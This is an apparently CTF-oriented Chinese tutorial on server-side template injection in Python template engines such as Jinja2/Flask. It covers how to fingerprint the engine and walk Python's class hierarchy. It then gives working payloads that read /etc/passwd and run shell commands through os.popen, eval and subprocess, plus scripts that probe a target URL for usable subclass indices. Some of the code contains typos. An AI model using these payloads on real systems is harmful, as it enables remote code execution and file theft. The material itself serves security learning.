一SSTI漏洞原理SSTIServer-Side Template Injection是一种服务器端模板注入漏洞发生在应用程序使用模板引擎渲染用户输入时未能正确过滤或转义用户提供的内容。服务端模板有很多网页是使用模板生成的html页面。所以就会存在SSTI漏洞的风险漏洞成因就是服务端接收了用户的恶意输入以后未经任何处理就将其作为 Web 应用模板内容的一部分模板引擎在进行目标编译渲染的过程中执行了用户插入的可以破坏模板的语句因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。简单来说ssti漏洞中网站的“模板引擎”把用户输入的内容错误地当成了可执行的代码而不是单纯的文字。例如学校发了一张奖状模板上面写着“{{姓名}}同学获得{{奖项}}”。正常情况下你填“张三”和“三好学生”打印出来就是“张三同学获得三好学生”。但如果有人故意在“奖项”那里填**“{{7*7}}”**结果打印出来变成“张三同学获得49”——这就说明模板把你的输入当成数学题算了而不是普通文字。也就是说如果网页不存在ssti漏洞你注入{{7*7}}是原路返回不会计算的。但是如果它执行了返回了49就说明漏洞可以被RCE攻击Ssti漏洞注入的基本流程有以下几点漏洞检测、引擎识别、信息收集、代码执行/文件操作下面是我从网上找到可以说是最全的渲染引擎以及他们的payload格式这个引擎图解释一下下图中的引擎是支持用服务端模板生成html网页的框架结构。常见有ssti漏洞的地方php: Twig Smarty Bladepython: Django flaskjava:freemarker二推理用的什么模板注入漏洞检测明确模板类型的意义在于它们的编写语言不同的模板就可以更精确的找到注入语句网络上这张图非常的常见啊这里解释一下首先输入${7*7}如果代码执行了也就是说它回显是49。那么就代表着绿色箭头下一步就可以输入a{*comment*}b执行出来是ab来判断如果代码没有执行也就是说回显还是${7*7}这样就代表着红色箭头。下一步就输入{{7*7}}去判断以此类推……Os:这里的${“z”.join(“ab”)}执行出来是azb意思就是把z插入在ab之间Not vulnerable表示这里没有模板注入漏洞另{{7*7}}在Twig中返回49在Jinja2中返回77777777三继承关系魔术方法回显含义Print(c.__class__)class’__main__.C’当前类CPrint(c.__class__.__base__)class’__main__.B’当前类C的父类BPrint(c.__class__.__base__.__base__)class’__main__.A’父类的父类Print(c.__class__.__base__.__base__.__base__)class ‘object’层层递进Print(c._class__.__mro__)class’__main__.C’class’__main__.B’class’__main__.A’class ’object’罗列所有父类关系C(0)—B(1)—A(2)—objectPrint(c.class__.__mro [1].__subclasses__())class’__main__.C’class’__main__.D’查看B下的所有子类Print(c.class__.__mro __.__subclasses__()[1])class’__main__.D’调用D类四魔术方法1__class____class__ 是一个内置属性用于返回对象所属的类。这个属性在每个对象中都存在可以用来获取对象的类信息2__bases____bases__ 是一个内置属性用于返回一个类所直接继承的类。它以元组的形式返回所有直接父类。3__base____base__ 是一个内置属性用于返回一个类所直接继承的类。与 __bases__ 不同__base__ 返回的是单个父类而不是元组。4__mro____mro__ 是一个内置属性用于返回解析方法调用的顺序。它是一个元组包含了类及其所有父类的顺序5__subclasses__()__subclasses__() 是一个内置方法用于获取类的所有子类。它返回一个包含所有子类的列表。6__init____init__ 是一个特殊方法用于初始化对象的属性。虽然它不是内置属性但在很多情况下它被用作跳板来调用 globals从而执行一些特殊操作。7__globals____globals__ 是一个内置属性用于获取函数所处空间下可使用的模块、方法以及所有变量。这里顺便解决一下当时见面考遗留下来的问题不知道调用指令的编号怎么办在我们调用指定路径下的子类后会出现一堆可调用指令真的是一堆我们上面也说过调用指令是要有编号的。这个时候我们就需要把全部子类复制到记事本里把“”全部替换成“/n”。之后就能得到一个全部换行的表格然后查找一下你想要的指令查看它在第几行由于从0开始所以要行数减一 行数减一就是它的序号我们这里就用{{‘’.__class__.__base__.__subclasses__()[117]}}发现我们成功调用这个时候就要用init来检查它是否重载{{‘’.__class__.__base__.__subclasses__()[117].__init__}}没有wrapper字眼说明重载成功{{‘’.__class__.__base__.__subclasses__()[117].__init__.__globals__}}前期工作到这一步就可以说是结束了剩下的步骤也不多了但是有些繁杂所以就另开一个板块去详细说明了。五SSTI常用模块注入1文件读取查找子类class’_frozen_importlib_extermal.FileLoader’FileLoader的利用{{“.__class__.__mro__[1].__subclasses__()[79][“get_data”](0,”/etc/passwd”)}}读取flag{{“.__class__.__mro__[1].__subclasses__()[79][“get_data”](0,”/flag”)}}这里有一个自动检索FileLoader的脚本import requests urlinput(请输入url链接) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)]}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: iffrozen_importlib_externalin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: pass2内建函数eval执行命令Payload:{{‘’.__class__.__bases__[0].__subclasses__()[65].__init__.__globals__[‘__builtins__’][‘eval’](‘__import__(“os”).popen(“cat/etc/passwd”).read()’)}}__builtins__直接访问python的所有“内置”标识符Eval()计算字符串表达式的值__import__加载os模块Popen()执行一个shell以运行命令来开启一个进程依然有查找脚本import requests urlinput(请输入url链接:) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)].__init__.__globals__[__builtins__]}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: ifevalin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: pass3os模块执行命令最常使用【1】在其他函数中直接调用os模块通过config调用os{{config.__class__.__init__.__globals__[‘os’].popen(‘whoami’).read()}}通过url_for,调用os{{url_for.__globals__.os.popen(‘whoami’).read()}}【2】在已经加载os的子类里调用os模块{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__[‘os’].popen(“ls -l/opt”).read()}}这个方法和上面用的很相近这里依然有查找os模板的脚本import requests urlinput(请输入url链接) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)].__init__.__globals__}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: ifos.pyin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: passpass4importlib类执行命令(了解)可以加载第三方库使用load_module加载osPayload{{[].__class__.__bases__.__subclasses__()[69][“load_module”](“os”)[“popen”](“whoami”).read()}}5linecache函数执行命令Linecache函数用于读取任意一个文件的任意一行而这个函数也引入了os模块所以我们了解可以利用这个函数就好Payload{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__[‘linecache’][‘os’].popen(“ls -l/opt”).read()}}{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__.linecache.os.popen(“ls -l/opt”).read()}}(6)subprocess.Popen类执行命令主要是这个函数可以替换os.system,os.popen等函数{{[].class__.__base__.__subclasses__()[200](‘ls/’,shellTrue,stdout-1).communicate()[0].strip()}}以上是ssti最基本的原理和payload。当然ssti也有自动解题工具就是下面的焚靖。网上一般会让你去下载sstimap但是个人感觉下来焚靖要更好用。关于工具就不细讲了这里放一个师傅的wpfenjing工具使用_焚靖-CSDN博客